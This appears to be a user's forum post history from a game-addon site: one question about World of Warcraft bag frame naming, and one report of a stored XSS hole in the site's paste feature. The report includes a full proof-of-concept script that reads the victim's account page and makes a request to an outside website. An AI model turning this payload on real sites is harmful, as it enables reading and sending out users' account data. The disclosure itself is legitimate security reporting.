• 0

    posted a message on Bag frame naming

    Hi,

     

    I tend to find the bag frame namings very hard to work with.

    If you open all your bags (standard hotkey "b" or OpenAllBags()), they are named ContainerFrameX, where X starts with 1 (your standard bagpack) and increases by 1 for each additional bag. If you open a single bag, it is always named ContainerFrame1. So no matter how many bags you open, the first one always is ContainerFrame1, even if it has another number when opening all bags at once.

    If I walk through every bag looking for a certain item, how can I save a reference to find this item again when the user only opens one bag afterwards? I don't want to search for it again.

    Posted in: AddOn HELP!
  • 0

    posted a message on Security issue via paste functionality

    Currently the paste functionality under https://authors.curseforge.com/paste is broken. It allows for XSS without any limitations, as far as I can see. Proof (does nothing harmful): https://authors.curseforge.com/paste/19c967e3

     

    The code does:

    • make an XHR to an arbitrary website and output the result
    • make an XHR to curse itself and outputs your curse join date
    • change the DOM a bit

    Consequences are:

    • You can probably delete projects (and user accounts?)
    • You can read everything available on curseforge and pass it to some other website and save it
    • ...

     

    It's difficult to post the code even here on this forum, it could be vulnerable, too:

     

    <script>
    	$(function() {
    		$('body').append($('<div style="padding: 8px; position: absolute; left: 100px; top: 100px; z-index: 1000222222220; background-color: #f4f4f4; color: #444444; border: 1px solid #cdcdcd; width: 500px; height: 200px;" id="proof"><strong>Data fetched from foreign website:</strong><div id="foreign"></div><br><br><strong>Data fetched from Curse (your join date):</strong> <div id="curse"></div></div>'));
    
    		// DOM manipulation
    		$('.primary-header-wrapper').parent().remove();
    
    		$.get('https://levelupgilde.de/js/requests/getSquad.php', function(data) {
    			$('#foreign').html(data);
    		});
    
    		$.get('https://authors.curseforge.com/account/preferences', function(data) {
    			let str = $(data).find('span.tip').html();
    			$('#curse').html(str);
    		});
    
    		$(document).keyup(function(e) {
    			if(e.key === 'Escape') {
    				$('#proof').fadeOut();
    			}
    		});
    	});
    </script>
    Posted in: General Discussion
  • To post a comment, please or register a new account.